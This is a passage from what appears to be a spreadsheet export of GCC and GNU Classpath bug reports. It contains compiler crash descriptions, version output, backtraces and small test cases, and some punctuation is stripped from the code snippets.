Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.8.0-3ubuntu3~12.04' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++gofortranobjcobj-c++ --prefix=/usr --program-suffix=-4.8 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.8 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --with-system-zlib --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.8.0 (Ubuntu/Linaro 4.8.0-3ubuntu3~12.04)
and gfortran 4.7.3 on
$ uname -a
Darwin 11.4.2 Darwin Kernel Version 11.4.2: Thu Aug 23 16:25:48 PDT 2012 root:xnu-1699.32.7~1/RELEASE_X86_64 x86_64
$ gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/opt/local/libexec/gcc/x86_64-apple-darwin11/4.7.3/lto-wrapper
Target: x86_64-apple-darwin11
Configured with: ../gcc-4.7.3/configure --prefix=/opt/local --build=x86_64-apple-darwin11 --enable-languages=cc++objcobj-c++ltofortranjava --libdir=/opt/local/lib/gcc47 --includedir=/opt/local/include/gcc47 --infodir=/opt/local/share/info --mandir=/opt/local/share/man --datarootdir=/opt/local/share/gcc-4.7 --with-libiconv-prefix=/opt/local --with-local-prefix=/opt/local --with-system-zlib --disable-nls --program-suffix=-mp-4.7 --with-gxx-include-dir=/opt/local/include/gcc47/c++/ --with-gmp=/opt/local --with-mpfr=/opt/local --with-mpc=/opt/local --with-ppl=/opt/local --with-cloog=/opt/local --enable-cloog-backend=isl --disable-cloog-version-check --enable-stage1-checking --disable-multilib --enable-lto --enable-libstdcxx-time --with-as=/opt/local/bin/as --with-ld=/opt/local/bin/ld --with-ar=/opt/local/bin/ar --with-bugurl=https://trac.macports.org/newticket --disable-ppl-version-check --with-pkgversion='MacPorts gcc47 4.7.3_1'
Thread model: posix
gcc version 4.7.3 (MacPorts gcc47 4.7.3_1)
I don't think this is a simple stack issue:
$ ulimit -a
core file size          (blocks -c) unlimited
data seg size           (kbytes -d) unlimited
scheduling priority             (-e) 0
file size               (blocks -f) unlimited
pending signals                 (-i) 128297
max locked memory       (kbytes -l) 64
max memory size         (kbytes -m) unlimited
open files                      (-n) 1024
pipe size            (512 bytes -p) 8
POSIX message queues     (bytes -q) 819200
real-time priority              (-r) 0
stack size              (kbytes -s) unlimited
cpu time               (seconds -t) unlimited
max user processes              (-u) 128297
virtual memory          (kbytes -v) unlimited
file locks                      (-x) unlimited
The following test case runs fine
$ echo 33554431 | ./a.out
but this one fails
$ echo 33554432 | ./a.out
Operating system error: Cannot allocate memory
Memory allocation failed
compilation:
$ gfortran -g -Wall -Wextra -fno-strict-aliasing -fwrapv -fcheck=all -fdump-core -fbacktrace test_char_array.f95
(without the -f options the code simply returns a segmentation fault.)
code:
$ cat test_char_array.f95
program test_char
   implicit none
   integer :: i
   read* i
   print* trim(test(i))
   contains
      function test(i)
         integer intent(in) :: i
         character(len=i) :: test
         test(1:1) = A
      endfunction test
endprogram test_char
Many thanks in advance.
Albert</t>
  </si>
  <si>
    <t>apbartok</t>
  </si>
  <si>
    <t>GCC-31751</t>
  </si>
  <si>
    <t>[4.2 regression] ICE with forgotten member declaration</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.0.0:
==========================================================
struct A
{
  int i
}
template int A::foo(int T::*) { return 0 }
int j = A::foo(
==========================================================
bug.cc:6: error: no 'int A::foo(int T::*)' member function declared in class 'A'
bug.cc:6: error: template definition of non-template 'int A::foo(int T::*)'
bug.cc:8: internal compiler error: tree check: expected record_type or union_type or qual_union_type have template_type_parm in lookup_base at cp/search.c:213
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-58326</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE in check_loop_closed_ssa_use at tree-ssa-loop-manip.c:551</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -O2 and -O3 on x86_64-linux (both 32-bit and 64-bit modes). 
This is a regression from 4.8.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --enable-languages=cc++objcobj-c++fortranlto --with-gmp=/usr/local/gcc-trunk --with-mpfr=/usr/local/gcc-trunk --with-mpc=/usr/local/gcc-trunk --with-cloog=/usr/local/gcc-trunk --prefix=/usr/local/gcc-trunk
Thread model: posix
gcc version 4.9.0 20130905 (experimental) [trunk revision 202269] (GCC) 
$ gcc-trunk -O1 -c small.c
$ gcc-4.8 -O2 -c small.c  
$ gcc-trunk -O2 -c small.c
small.c: In function â€˜fooâ€™:
small.c:5:6: internal compiler error: in check_loop_closed_ssa_use at tree-ssa-loop-manip.c:551
 void foo ()
      ^
0xa25746 check_loop_closed_ssa_use
	../../gcc-trunk/gcc/tree-ssa-loop-manip.c:550
0xa2717c check_loop_closed_ssa_stmt
	../../gcc-trunk/gcc/tree-ssa-loop-manip.c:566
0xa2717c verify_loop_closed_ssa(bool)
	../../gcc-trunk/gcc/tree-ssa-loop-manip.c:600
0xdc61d8 tree_unroll_loops_completely(bool bool)
	../../gcc-trunk/gcc/tree-ssa-loop-ivcanon.c:1239
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
---------------------------------
int a *d 
long b
short c
void foo ()
{
  int e
 lbl:
  for (c = 0 c &lt; 2 c++)
    {
      if (1 &gt;&gt; b)
	break
      e = *d
      for ( a a++)
        {
	  *d = e
	  if (b)
	    goto lbl
        }
    }
}</t>
  </si>
  <si>
    <t>GCC-2223</t>
  </si>
  <si>
    <t>overflow in update_equiv_regs</t>
  </si>
  <si>
    <t>I get this:
$ ./cc1 -quiet -O2 z80x.i -da grep across - z80x.i.*
z80x.i.18.lreg:Register 3489 used 116 times across -1044381696 insns set 36 times dies in 24 places crosses 100 calls GENERAL_REGS or none pointer.
I think the used ... across -1044381696 insns is bad but
I have *not* been able to get it to provoke a visible error
on the SH port.
On a new port that I'm working on I get the same kind of
thing and it does *appear* to cause real problems later on.
The negative value for REG_LIVE_LENGTH (3489) comes from an
overflow at local-alloc.c(1012):
  REG_LIVE_LENGTH (regno) *= 2
I suspect that this only happens on ports which don't define
NO_FUNCTION_CSE (which would rule out all the primary
platforms).
Release:
GNU CPP version 2.97 20010205 (experimental) (cpplib) (Hitachi SH)
Environment:
Hosted on i686-pc-linux-gnu
Configured with --enable-languages=c --prefix=/foo/bar/wibble --target=sh
How-To-Repeat:
Source file z80x.i is attached.</t>
  </si>
  <si>
    <t>foad</t>
  </si>
  <si>
    <t>GCC-68972</t>
  </si>
  <si>
    <t>g++.dg/cpp1y/vla-initlist1.C test case fails on powerpc64le</t>
  </si>
  <si>
    <t>PASS: g++.dg/cpp1y/vla-initlist1.C  -std=gnu++11 (test for excess errors)
FAIL: g++.dg/cpp1y/vla-initlist1.C  -std=gnu++11 execution test
PASS: g++.dg/cpp1y/vla-initlist1.C  -std=gnu++14 (test for excess errors)
FAIL: g++.dg/cpp1y/vla-initlist1.C  -std=gnu++14 execution test
This has been failing for quite some time at least back to gcc 5.  The problem does not occur on x86.
__builtin_abort is called because the variable length array is not initialized as expected.
  { int i[x] = { 42 42 42 42 } }
  {
    A a[x] = { argc }
    if (a[1].i != 42)
      __builtin_abort ()</t>
  </si>
  <si>
    <t>GCC-840</t>
  </si>
  <si>
    <t>internal compiler error  problem in qcstring.h  I got 2 separate errors 2 separate times both from qcstring.h</t>
  </si>
  <si>
    <t>Tried to install latest QT on my Suse 7.0 Linux. Tried twice
got two separate errors both involving qcstring.h
/usr/local/qt/include/qcstring.h: In function 'bool operator != (const char *const QCString &amp;)':
/usr/local/qt/include/qcstring.h:307:Internal compiler error
cpp:output pipe has been closed
make[1]:Leaving directory 'usr/local/qt/src'
make:***[src] error 2
Second error:
qcstring.h: in method 'QCString::QCString(const QCString &amp;)':
qcstring.h:153:Internal compiler error in 'save_for_inline_nocopy:
at integrate.c:916
make[1]: ***[kernel/qsignal.o] error 1
If you need anything else let me know...hopefully I wont destroy 
Linux....Thanx!
Release:
unknown
Environment:
I'm not a linux guru this is my first time using it. It said to report what happened so I am. Forgive me if it's not what you need :(
How-To-Repeat:
I don't know. I just ran ./configure then make and those errors
happened</t>
  </si>
  <si>
    <t>jax21</t>
  </si>
  <si>
    <t>GCC-50222</t>
  </si>
  <si>
    <t>ICE with -O{12} -funswitch-loops -ftree-loop-distribution</t>
  </si>
  <si>
    <t>Created attachment 25123
Temporary saved file
I'm hitting an ICE in the attached file the ICE happens with either -O1 and -O2 with gcc being killed for a segmentation fault.
Here is the output of $ LANG=C gcc -O1 -funswitch-loops -ftree-loop-distribution -I. -I.. -I../.. nutenc.c -include libavutil/internal.h -I ../../ -c -save-temps -v
Using built-in specs.
Reading specs from /usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/vanilla.specs
Reading specs from /usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/hardenednossp.specs
Reading specs from /usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/hardenednopie.specs
COLLECT_GCC=/usr/x86_64-pc-linux-gnu/gcc-bin/4.6.1/gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-pc-linux-gnu/4.6.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/configure --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.6.1 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.6.1 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.6.1/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.6.1/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/include/g++-v4 --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --disable-altivec --disable-fixed-point --without-ppl --without-cloog --enable-lto --enable-nls --without-included-gettext --with-system-zlib --disable-werror --enable-secureplt --enable-multilib --enable-libmudflap --disable-libssp --enable-esp --enable-libgomp --with-python-dir=/share/gcc-data/x86_64-pc-linux-gnu/4.6.1/python --enable-checking=release --disable-libgcj --enable-languages=cc++ --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --with-bugurl=http://bugs.gentoo.org/ --with-pkgversion='Gentoo Hardened 4.6.1-r1 p1.0 pie-0.4.5'
Thread model: posix
gcc version 4.6.1 (Gentoo Hardened 4.6.1-r1 p1.0 pie-0.4.5) 
COLLECT_GCC_OPTIONS='-O1' '-funswitch-loops' '-ftree-loop-distribution' '-I' '.' '-I' '..' '-I' '../..' '-include' 'libavutil/internal.h' '-I' '../../' '-c' '-save-temps' '-v' '-mtune=generic' '-march=x86-64'
 /usr/libexec/gcc/x86_64-pc-linux-gnu/4.6.1/cc1 -E -quiet -v -I . -I .. -I ../.. -I ../../ -include libavutil/internal.h nutenc.c -D_FORTIFY_SOURCE=2 -mtune=generic -march=x86-64 -funswitch-loops -ftree-loop-distribution -O1 -fpch-preprocess -o nutenc.i
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/../../../../x86_64-pc-linux-gnu/include
ignoring duplicate directory ../../
#include ... search starts here:
#include  search starts here:
 .
 ..
 ../..
 /usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/include
 /usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-O1' '-funswitch-loops' '-ftree-loop-distribution' '-I' '.' '-I' '..' '-I' '../..' '-include' 'libavutil/internal.h' '-I' '../../' '-c' '-save-temps' '-v' '-mtune=generic' '-march=x86-64'
 /usr/libexec/gcc/x86_64-pc-linux-gnu/4.6.1/cc1 -fpreprocessed nutenc.i -quiet -dumpbase nutenc.c -mtune=generic -march=x86-64 -auxbase nutenc -O1 -version -funswitch-loops -ftree-loop-distribution -o nutenc.s
GNU C (Gentoo Hardened 4.6.1-r1 p1.0 pie-0.4.5) version 4.6.1 (x86_64-pc-linux-gnu)
        compiled by GNU C version 4.6.1 GMP version 5.0.2 MPFR version 3.0.1-p4 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C (Gentoo Hardened 4.6.1-r1 p1.0 pie-0.4.5) version 4.6.1 (x86_64-pc-linux-gnu)
        compiled by GNU C version 4.6.1 GMP version 5.0.2 MPFR version 3.0.1-p4 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: ee3b77d3e57fd2e78f1e57adb19b4a68
nutenc.c: In function 'write_header':
nutenc.c:580:12: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
And the output of $ LANG=C gcc -O2 -funswitch-loops -ftree-loop-distribution -I. -I.. -I../.. nutenc.c -include libavutil/internal.h -I ../../ -c -save-temps -v
Using built-in specs.
Reading specs from /usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/vanilla.specs
Reading specs from /usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/hardenednossp.specs
Reading specs from /usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/hardenednopie.specs
COLLECT_GCC=/usr/x86_64-pc-linux-gnu/gcc-bin/4.6.1/gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-pc-linux-gnu/4.6.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/configure --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.6.1 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.6.1 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.6.1/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.6.1/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/include/g++-v4 --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --disable-altivec --disable-fixed-point --without-ppl --without-cloog --enable-lto --enable-nls --without-included-gettext --with-system-zlib --disable-werror --enable-secureplt --enable-multilib --enable-libmudflap --disable-libssp --enable-esp --enable-libgomp --with-python-dir=/share/gcc-data/x86_64-pc-linux-gnu/4.6.1/python --enable-checking=release --disable-libgcj --enable-languages=cc++ --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --with-bugurl=http://bugs.gentoo.org/ --with-pkgversion='Gentoo Hardened 4.6.1-r1 p1.0 pie-0.4.5'
Thread model: posix
gcc version 4.6.1 (Gentoo Hardened 4.6.1-r1 p1.0 pie-0.4.5) 
COLLECT_GCC_OPTIONS='-O2' '-funswitch-loops' '-ftree-loop-distribution' '-I' '.' '-I' '..' '-I' '../..' '-include' 'libavutil/internal.h' '-I' '../../' '-c' '-save-temps' '-v' '-mtune=generic' '-march=x86-64'
 /usr/libexec/gcc/x86_64-pc-linux-gnu/4.6.1/cc1 -E -quiet -v -I . -I .. -I ../.. -I ../../ -include libavutil/internal.h nutenc.c -D_FORTIFY_SOURCE=2 -mtune=generic -march=x86-64 -funswitch-loops -ftree-loop-distribution -O2 -fpch-preprocess -o nutenc.i
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/../../../../x86_64-pc-linux-gnu/include
ignoring duplicate directory ../../
#include ... search starts here:
#include  search starts here:
 .
 ..
 ../..
 /usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/include
 /usr/lib/gcc/x86_64-pc-linux-gnu/4.6.1/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-O2' '-funswitch-loops' '-ftree-loop-distribution' '-I' '.' '-I' '..' '-I' '../..' '-include' 'libavutil/internal.h' '-I' '../../' '-c' '-save-temps' '-v' '-mtune=generic' '-march=x86-64'
 /usr/libexec/gcc/x86_64-pc-linux-gnu/4.6.1/cc1 -fpreprocessed nutenc.i -quiet -dumpbase nutenc.c -mtune=generic -march=x86-64 -auxbase nutenc -O2 -version -funswitch-loops -ftree-loop-distribution -o nutenc.s
GNU C (Gentoo Hardened 4.6.1-r1 p1.0 pie-0.4.5) version 4.6.1 (x86_64-pc-linux-gnu)
        compiled by GNU C version 4.6.1 GMP version 5.0.2 MPFR version 3.0.1-p4 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C (Gentoo Hardened 4.6.1-r1 p1.0 pie-0.4.5) version 4.6.1 (x86_64-pc-linux-gnu)
        compiled by GNU C version 4.6.1 GMP version 5.0.2 MPFR version 3.0.1-p4 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: ee3b77d3e57fd2e78f1e57adb19b4a68
nutenc.c: In function 'write_header':
nutenc.c:580:12: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The backtrace by gdb is the following:
#0  0x00000000008796bf in rename_use_op (bb=0x7ffff67d0b60) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/tree-vect-loop-manip.c:55
#1  rename_variables_in_bb (bb=0x7ffff67d0b60) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/tree-vect-loop-manip.c:95
#2  0x000000000087971e in rename_variables_in_loop (loop=0x7ffff67ac908) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/tree-vect-loop-manip.c:111
#3  0x00000000007ab38a in copy_loop_before (loop= stmts=) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/tree-loop-distribution.c:137
#4  generate_loops_for_partition (loop= stmts=) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/tree-loop-distribution.c:171
#5  generate_code_for_partition (loop= stmts=) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/tree-loop-distribution.c:395
#6  ldist_gen (loop= stmts=) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/tree-loop-distribution.c:1133
#7  distribute_loop (loop= stmts=) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/tree-loop-distribution.c:1218
#8  distribute_loop (loop= stmts=) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/tree-loop-distribution.c:1160
#9  0x00000000007ab78c in tree_loop_distribution () at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/tree-loop-distribution.c:1274
#10 0x00000000006d2c51 in execute_one_pass (pass=0x112e0a0) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/passes.c:1556
#11 0x00000000006d2f1d in execute_pass_list (pass=0x112e0a0) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/passes.c:1611
#12 0x00000000006d2f2f in execute_pass_list (pass=0x112f180) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/passes.c:1612
#13 0x00000000006d2f2f in execute_pass_list (pass=0x112e400) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/passes.c:1612
#14 0x00000000007b32e5 in tree_rest_of_compilation (fndecl=0x7ffff6bb5900) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/tree-optimize.c:422
#15 0x000000000090db6f in cgraph_expand_function (node=0x7ffff6bcf2c0) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/cgraphunit.c:1576
#16 0x000000000090f958 in cgraph_expand_all_functions () at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/cgraphunit.c:1635
#17 cgraph_optimize () at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/cgraphunit.c:1899
#18 0x000000000090fd9a in cgraph_finalize_compilation_unit () at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/cgraphunit.c:1096
#19 0x00000000004b5685 in c_write_global_declarations () at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/c-decl.c:9871
#20 0x0000000000772758 in compile_file (argc=26 argv=0x7fffffffcac8) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/toplev.c:591
#21 do_compile (argc=26 argv=0x7fffffffcac8) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/toplev.c:1900
#22 toplev_main (argc=26 argv=0x7fffffffcac8) at /var/tmp/portage/sys-devel/gcc-4.6.1-r1/work/gcc-4.6.1/gcc/toplev.c:1963
#23 0x00007ffff6f74d6d in __libc_start_main () from /lib64/libc.so.6
#24 0x00000000004a3165 in _start ()</t>
  </si>
  <si>
    <t>franxisco1988+gcc</t>
  </si>
  <si>
    <t>CLASSPATH-25843</t>
  </si>
  <si>
    <t>JSplitPanel bugs</t>
  </si>
  <si>
    <t>(test case sent to rkennke)
- the setDividerLocation doesn't work correctly and the divider is placed too far at left
- when dragging the divider it can be dragged more than the left border of the window
- the whole right panel acts as a dragging sensible area... clicking inside it activates the divider
- the one touchable expandable has no effect and is non functional or not implemented
in other applications I write I also have the case where the divider comes up in the wrong place as in this test case but it cannot be dragged afterwards. I wasn't able to reproduce this in a small test case though.</t>
  </si>
  <si>
    <t>CLASSPATH-29264</t>
  </si>
  <si>
    <t>the method writeDTD(String dtd) in gnu.xml.stream.XMLStreamWriter doesn't work</t>
  </si>
  <si>
    <t>a simple example:
writer.writeDTD(rules SYSTEM \rules.dtd\)
what should I get?: 
but I get this:
Exception in thread main java.lang.IllegalArgumentException: illegal Name: rules SYSTEM rules.dtd
   at gnu.xml.stream.XMLStreamWriterImpl.writeDTD(libgcj.so.70)
   at jlem.rule.RuleWriter.(Test)
   at Test.main(Test)
when I try this: writer.writeDTD(rules.dtd) I get: 
It works but this dtd-declaration is totally useless.
So the method doesn't allow blanks and quotes but they are needed.
gnu.xml.stream.XMLStreamWriterImpl.writeDTD has to be changed to allow Strings like this: rules SYSTEM \rules.dtd\.
the method:
 public void writeDTD(String dtd)
    throws XMLStreamException
  {
    // Really thoroughly pointless method...
    try
      {
        if (!isName(dtd))
          throw new IllegalArgumentException(illegal Name:  + dtd)
        writer.write(&lt;!DOCTYPE )
        writer.write(dtd)
        writer.write('&gt;')
      }
    catch (IOException e)
      {
        XMLStreamException e2 = new XMLStreamException(e)
        e2.initCause(e)
        throw e2
      }
  }</t>
  </si>
  <si>
    <t>GCC-51288</t>
  </si>
  <si>
    <t>[C++0x] get_money implementation is missing the sentry object (does not skip leading whitespace)</t>
  </si>
  <si>
    <t>The I/O manipulator std::get_money as implemented so far fails to skip leading whitespace:
#include 
#include 
#include 
#include 
int main()
{
    std::string str =    $1.23
    std::istringstream s1(str)
    try {
            s1.imbue(std::locale(en_US.UTF-8))
            long double val
            s1 &gt;&gt; std::get_money(val)
            if(s1)
                    std::cout &lt;&lt; val &lt;&lt; '\n'
            else
                    std::cout &lt;&lt; Bug\n
    } catch(...) {
        std::cout &lt;&lt; Missing locale en_US.UTF-8 cannot run this test\n
    }
}
g++ 4.7.0 20111105 output:
Bug
clang++ 2.9/libc++-svn output:
123
The cause:
GCC implementation of operator&gt;&gt;(basic_istream&amp; __is _Get_money __f) calls __mg.get right away but the standard says
Â§27.7.5/1
The expression in &gt;&gt; get_money(mon intl) described below behaves as a formatted input function (27.7.2.2.1).
Â§27.7.2.2.1/1
Each formatted input function begins execution by constructing an object of class sentry with the noskipws (second) argument false.</t>
  </si>
  <si>
    <t>cubbi</t>
  </si>
  <si>
    <t>GCC-47705</t>
  </si>
  <si>
    <t>[4.5 Regression] internal compiler error: in convert_nontype_argument at cp/pt.c:5006</t>
  </si>
  <si>
    <t>Running the following (invalid) code:
template class Something {
}
extern char const xyz
class SomethingElse:public Something {
}
through gcc 4.5.2 results in:
test.cpp:6:41: internal compiler error: in convert_nontype_argument at cp/pt.c:5006
The problem with the code is that xyz should be xyz[] -- I'd expect the error message to be
test.cpp:6:41: error: â€˜xyzâ€™ is not a valid template argument because â€˜xyzâ€™ is a variable not the address of a variable
Which is what you get if you remove the const in extern char const xyz</t>
  </si>
  <si>
    <t>GCC-49123</t>
  </si>
  <si>
    <t>[4.6 Regression] FAIL: gcc.c-torture/execute/pr48973-[12].c</t>
  </si>
  <si>
    <t>On Linux/x86 revision 174063 gave:
FAIL: gcc.c-torture/execute/pr48973-1.c execution  -O2 -flto
FAIL: gcc.c-torture/execute/pr48973-1.c execution  -O2 -flto
FAIL: gcc.c-torture/execute/pr48973-1.c execution  -O2 -flto -flto-partition=none
FAIL: gcc.c-torture/execute/pr48973-1.c execution  -O2 -flto -flto-partition=none
FAIL: gcc.c-torture/execute/pr48973-2.c execution  -O2 -flto
FAIL: gcc.c-torture/execute/pr48973-2.c execution  -O2 -flto
FAIL: gcc.c-torture/execute/pr48973-2.c execution  -O2 -flto -flto-partition=none
FAIL: gcc.c-torture/execute/pr48973-2.c execution  -O2 -flto -flto-partition=none
revision 174054 is OK.</t>
  </si>
  <si>
    <t>GCC-51524</t>
  </si>
  <si>
    <t>[BMI2] New regression on 182266 vs 182257</t>
  </si>
  <si>
    <t>Hi
Seems we've got new regression on trunk:
FAIL: gcc.target/i386/bmi2-mulx32-1a.c scan-assembler-times bmi2_umulsidi3_1 1
FAIL: gcc.target/i386/bmi2-mulx32-2a.c scan-assembler-times mulx[ \\t]+[^\n]* 1</t>
  </si>
  <si>
    <t>CLASSPATH-22755</t>
  </si>
  <si>
    <t>JamVM/Classpath crashes with image loading programs</t>
  </si>
  <si>
    <t xml:space="preserve">I found a strange segfault issue in programs that try to load/display images (GIF/JPEG).
Mark and I have located the segfault to occur in
native/jni/gtk-peer/gnu_java_awt_peer_gtk_GdkPixbufDecoder.c Line 226. Here is gdk_env used (which probably should be env instead). The real problem seems to be that GTKToolkit is not yet initialized properly.
The following workaround seems to work though:
--- gnu/java/awt/peer/gtk/GdkPixbufDecoder.java 26 Jun 2004 16:06:47 -0000     1.5
+++ gnu/java/awt/peer/gtk/GdkPixbufDecoder.java 28 Jun 2004 20:34:49 -0000
@@ -576 +578 @@
         System.loadLibrary(gtkpeer)
       }
     initStaticState ()
+    java.awt.Toolkit.getDefaultToolkit()
+    try { Thread.sleep(500) } catch (InterruptedException ignored) { }
   }
   native static void initStaticState ()
   private final int native_state = GtkGenericPeer.getUniqueInteger ()
this means if we wait long enough for GTKToolkit to initialize the segfault does not occur.
Any ideas how to fix this? Maybe I should add that I tried that with JamVM 1.1.4
/Roman
</t>
  </si>
  <si>
    <t>GCC-17495</t>
  </si>
  <si>
    <t>The gcc online documentation contains no GCC 3.4.2 manual</t>
  </si>
  <si>
    <t>The gcc online documentation http://gcc.gnu.org/onlinedocs/
contains GCC 3.4.1 manuals but no manuals for GCC 3.4.2.</t>
  </si>
  <si>
    <t>GCC-16364</t>
  </si>
  <si>
    <t>[4.0 Regression] IA-64 long double/union argument causes ICE</t>
  </si>
  <si>
    <t>A testcase that passes an argument consisting of a union with a single long
double field gets an ICE.  The union has size 16 and mode TImode.  The ABI says
that this is an HFA which must be passed in an FP register.  The FP regs can
hold at most XFmode.  So we end up with a TImode move into/out of an FP reg
which generates an unrecognizable insn.
Defining MEMBER_TYPE_FORCES_BLK does not help.  We don't get an abort but we
end up with block moves into/out of the FP regs which use DImode and hence
require two FP regs which is wrong.  The union fits in one FP reg as XFmode and
requires an XFmode load/store instruction to move it between FP regs and memory.</t>
  </si>
  <si>
    <t>GCC-42680</t>
  </si>
  <si>
    <t>[fortran-dev Regression] ICE in gimplify_expr at gimplify.c:7176</t>
  </si>
  <si>
    <t>The test case attached to
http://gcc.gnu.org/ml/fortran/2010-01/msg00001.html
fails on fortran-dev (svn rev.155786) with
gfcbug96d.f90: In function â€˜cgâ€™:
gfcbug96d.f90:77:0: internal compiler error: in gimplify_expr at gimplify.c:7176
No problem on a slightly older trunk.</t>
  </si>
  <si>
    <t>GCC-25365</t>
  </si>
  <si>
    <t>g++ crashes with segmentation fault when -Wall is active</t>
  </si>
  <si>
    <t>Hi
the g++ crashes with segmantation fault when compiling the following code snippet with g++ -c -Wall. It compiles without the -Wall option.
============8&lt;================
#include 
// http://www.oreillynet.com/pub/a/network/2003/10/07/michael_barr.html
// Example 2. An anonymous union allows the compiler to report
// typedef errors automatically 
static union
{
    char    int8_t_incorrect[sizeof(  int8_t) == 1]
    char   uint8_t_incorrect[sizeof( uint8_t) == 1]
    char   int16_t_incorrect[sizeof( int16_t) == 2]
